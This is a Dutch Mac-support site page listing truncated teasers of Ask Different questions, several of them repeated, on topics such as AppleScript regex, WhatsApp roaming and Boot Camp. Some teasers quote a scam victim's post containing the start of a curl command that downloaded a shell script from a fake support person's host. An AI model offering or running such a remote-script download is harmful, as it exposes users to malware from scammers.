{$lblSkipToContent|ucfirst}

Regex does not work properly with chinese characters on applescript

dinsdag 9 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I'm trying to make a script that parse current folder into usable parts, following by pattern (\d\d\d\.\d+.\d+) - (.*)(\(.*)\) in python, which captures 3 groups {date, name, person} (date is in format of mine country so it's not in yyy…

Lees meer

Does WhatsApp use data from an inactive SIM card?

dinsdag 9 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I associated my WhatsApp account with a Canadian mobile/cell number. I am now in UK without any local SIM card installed. If I use WhatsApp outside of Wi-Fi, will it try to use/charge the Canadian cell number (i.e., high roaming charges…

Lees meer

MacOS Gone After Bootcamp Install

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

After installing Windows 8.1 on my Mac Mini 2011 (macOS High Sierra 10.13.6) using bootcamp everything seemed fine and working until one day I wanted to switch back to macOS. I used Option Restart but it only showed bootcamp so then I t…

Lees meer

MacOS Gone After Bootcamp Install

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

After installing Windows 8.1 on my Mac Mini 2011 (macOS High Sierra 10.13.6) using bootcamp everything seemed fine and working until one day I wanted to switch back to macOS. I used Option Restart but it only showed bootcamp so then I t…

Lees meer

I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer. curl -s -O http://REDACTED/pj…

Lees meer

MacOS Gone After Bootcamp Install

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

After installing Windows 8.1 on my Mac Mini 2011 (macOS High Sierra 10.13.6) using bootcamp everything seemed fine and working until one day I wanted to switch back to macOS. I used Option Restart but it only showed bootcamp so then I t…

Lees meer

Turn off memory swapping for Anaconda/Python

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I would like to turn off memory swapping on my MacBook Air M2 for Anaconda/Python. When I run some python codes (in jupyterlab Chrome) they can easily swap 20 GB, I don't want to swap it since speed it not relevant for me in this case p…

Lees meer

I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer. curl -s -O http://168.100.9.2…

Lees meer

To understand how Finder uses icons [closed]

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I cannot speak for everyone, of course, but it seems there are many people, not just me, who have or had the issue that Finder shows wrong icons. For example, you have Sublime Text installed, and you have test.md somewhere. But despite …

Lees meer

Prevent Manual Sleep

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

Is it possible to prevent a Mac from going to sleep immediately when a user chooses "Sleep" from the apple menu? I'm aware of caffeinate -i as a means of preventing automatic sleep (triggered via powerd after the system sleep time set i…

Lees meer

I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer. curl -s -O http://[REDACTED]/…

Lees meer

Is it possible to send a sms text to someone’s iPhone and make it appear that they replied to a number that they did not reply to?

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I received a text from a number on my iPhone that I do not recognize and the strange thing is that there is no conversation thread. The only text showing looks like it came from my phone replying back to them saying Hi with an emoji aft…

Lees meer

I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer. curl -s -O http://[REDACTED]/…

Lees meer

Prevent Manual Sleep

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

Is it possible to prevent a Mac from going to sleep immediately when a user chooses "Sleep" from the apple menu? I'm aware of caffeinate -i as a means of preventing automatic sleep (triggered via powerd after the system sleep time set i…

Lees meer

MacOS Gone After Bootcamp Install

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

After installing Windows 8.1 on my Mac Mini 2011 (macOS High Sierra 10.13.6) using bootcamp everything seemed fine and working until one day I wanted to switch back to macOS. I used Option Restart but it only showed bootcamp so then I t…

Lees meer

I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late... I entered the below command in my macbook terminal and it downloaded a .sh file on my computer. curl -s -O http://[REDACTED]/…

Lees meer

Does Whatsapp use data from inactive SIM?

maandag 8 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I associated my Whatsapp account with a Canadian mobile/cell number. I am now in UK with no local SIM installed. If I use Whatsapp outside of Wi-Fi, will it try to use/charge the Canadian cell number (i.e. high roaming charges)? …

Lees meer

Any idea what "Vietnamese IM" folder is?

zondag 7 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I have been browsing through my Mac user Library folder while trying to locate my FCPX assets and stumbled upon this folder (screenshot). It is named Vietnamese IM and the folder content seems like a shortcut to my user. FYI I am not Vi…

Lees meer

Regex does not work properly with chinese characters on applescript

zondag 7 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I'm trying to make a script that parse current folder into usable parts, following by pattern (\d\d\d\.\d+.\d+) - (.*)(\(.*)\) in python, which captures 3 groups {date, name, person} (date is in format of mine country so it's not in yyy…

Lees meer

Any Idea What "Vietnamese IM" Folder is?

zondag 7 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I have been browsing through my Mac user Library folder while trying to locate my FCPX assets and stumbled upon this folder (screenshot). It is named Vietnamese IM and the folder content seem like a shortcut to my user. FYI I am not Vie…

Lees meer

Any Idea What "Vietnamese IM" Folder is?

zondag 7 april 2024 inAsk Different (Tips-Tricks-Tutorials)

I have been browsing through my Mac user Library folder while trying to locate my FCPX assets and stumbled upon this folder (screenshot). It is named Vietnamese IM and the folder content seem like a shortcut to my user. FYI I am not Vie…

Lees meer

Internet - WiFi • e-mail • Software • Hardware • Reparatie • (Geheugen - SSD) Upgrades • Advies • Netwerken • Routers • Beheer op afstand (Teamviewer) • Onderhoud (Online Backup's) • Data Recovery • OSX Server • Synology NAS • Bootcamp - Parallels - VMWare

• 20 jaar ervaring •